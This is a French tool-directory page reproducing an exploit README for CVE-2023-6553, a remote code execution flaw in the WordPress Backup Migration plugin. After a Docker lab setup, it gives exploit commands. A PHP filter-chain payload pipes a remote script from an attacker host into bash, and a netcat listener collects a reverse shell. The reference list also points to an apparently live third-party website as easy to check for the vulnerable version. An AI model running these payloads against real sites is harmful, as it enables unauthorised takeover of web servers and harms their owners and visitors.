Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-6553 — Développement d'exploits pour CVE-2023-6553 sur le plugin de sauvegarde dans Wordpress | Kitploit
Outils/GitHubGitHub/harshit-mashru/cve-2023-6553
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubharshit-mashru/cve-2023-6553

CVE-2023-6553

Développement d'exploits pour CVE-2023-6553 sur le plugin de sauvegarde dans Wordpress

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-6553

Développement d'exploit pour CVE-2023-6553 sur le plugin Backup dans Wordpress

C'est un CVE critique avec un score CVSS de 9.8

La vulnérabilité permet à un attaquant d'envoyer des commandes au serveur exécutant la version vulnérable du plugin

Version vulnérable Backup <= 1.3.7

Configuration

  1. Clonez le dépôt

  2. Exécutez la commande ci-dessous pour configurer les conteneurs Docker

root@kitploit:~
docker-compose up -d

Vous devriez voir 2 conteneurs Docker

  • Wordpress
  • SQL
  1. Vous pouvez maintenant naviguer vers le site Wordpress sur l'IP du conteneur Docker ; il est également accessible à
root@kitploit:~
http://localhost:8000/
  1. Pour installer le plugin de sauvegarde vulnérable, exécutez la commande suivante
root@kitploit:~
wget https://downloads.wordpress.org/plugin/backup-backup.1.3.6.zip
  1. Connectez-vous ensuite au site Wordpress via le lien de l'étape 3 et installez le plugin de sauvegarde après l'avoir téléchargé avec la commande ci-dessus

Exploitation

  1. Démarrez un listener sur le port 9000 pour recevoir les callbacks lors de l'exécution de l'exploit.
root@kitploit:~
python3 -m http.server
  1. Exécutez le script Go en utilisant la commande suivante
root@kitploit:~
go run exploit.go -chain="<?php exec('curl <HOST_IP>:9000/a.sh |bash');?>"
  1. Vous obtiendrez l'erreur suivante
root@kitploit:~
HTTP Response Body:  <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.</p>
<hr>
<address>Apache/2.4.62 (Debian) Server at 172.18.0.3 Port 80</address>
</body></html>

Cela est dû au fait qu'après les conversions de filtres, la taille de l'en-tête dépasse la limite autorisée par le serveur.

  1. Nous divisons donc notre commande en fragments, les écrivons dans un fichier sur le serveur distant, puis l'exécutons ; mais avant cela, nous devons commencer à écouter pour obtenir un reverse shell
root@kitploit:~
nc -nlvp 8080

et exécutez maintenant la commande pour exploiter le plugin vulnérable

root@kitploit:~
python3 final_exploit.py
  1. Vous devriez avoir un reverse shell à ce stade

Références

  • https://patchstack.com/articles/test-wordpress-plugin-security/
  • https://patchstack.com/whitepaper/the-state-of-wordpress-security-in-2021/
  • https://wordpress.org/plugins/backup-backup/
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/backup-backup/backup-migration-137-unauthenticated-remote-code-execution
  • https://plugins.trac.wordpress.org/browser/backup-backup/​
  • https://github.com/synacktiv/php_filter_chain_generator/blob/main/php_filter_chain_generator.py ​
  • https://www.synacktiv.com/en/publications/php-filters-chain-what-is-it-and-how-to-use-it ​
  • Comme il est facile de vérifier si une version vulnérable de Wordpress est présente : https://www.thetraveloutlier.com/shop/​
Télécharger l’outil